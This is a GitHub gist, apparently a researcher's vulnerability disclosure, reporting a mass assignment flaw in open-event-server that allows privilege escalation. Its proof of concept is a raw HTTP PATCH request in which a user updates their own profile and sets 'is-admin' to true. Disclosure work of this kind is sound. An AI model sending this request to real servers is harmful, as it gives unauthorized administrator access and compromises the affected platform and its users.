Skip to content

Instantly share code, notes, and snippets.

@superboy-zjc

superboy-zjc/open-event-server-pe.md

Last active March 25, 2025 03:38
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save superboy-zjc/b3e9fea0cc85d03bdb5c8b38cc90becd to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save superboy-zjc/b3e9fea0cc85d03bdb5c8b38cc90becd to your computer and use it in GitHub Desktop.
Download ZIP
open-event-server is vulnerable to mass assignment attack, leading to privilege escalation
Raw
open-event-server-pe.md

open-event-server is vulnerable to mass assignment attack, leading to privilege escalation

Proof of Concept

Set is-admin to true when updating self-profile.

PATCH /v1/users/[YOUR_ID] HTTP/1.1
Host: target
Authorization: JWT YOUR_TOKEN
Content-Type: application/vnd.api+json

{"data":{"id":"6","attributes":{"email":" superboyzjc+3@gmail.com ","is-verified":true,"is-blocked":false,"is-profile-public":false,"is-admin":**true**,
"is-super-admin": false,"is-user-owner":false,"is-user-organizer":true,"is-user-coorganizer":false,"is-user-track-organizer":false,"is-user-moderator":false,"is-user-registrar":false,"is-sales-admin":false,"is-marketer":false,"was-registered-with-order":false,"first-name":"t","last-name":"t","public-name":null,"details":"","contact":null,"avatar-url":null,"icon-image-url":null,"small-image-url":null,"thumbnail-image-url":null,"original-image-url":null,"facebook-url":null,"instagram-url":null,"twitter-url":null,"google-plus-url":null,"deleted-at":null,"billing-contact-name":null,"billing-phone":null,"billing-country":null,"company":null,"billing-address":null,"billing-city":null,"billing-zip-code":null,"billing-tax-info":null,"billing-additional-info":null,"billing-state":null},"type":"user"}}

image

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment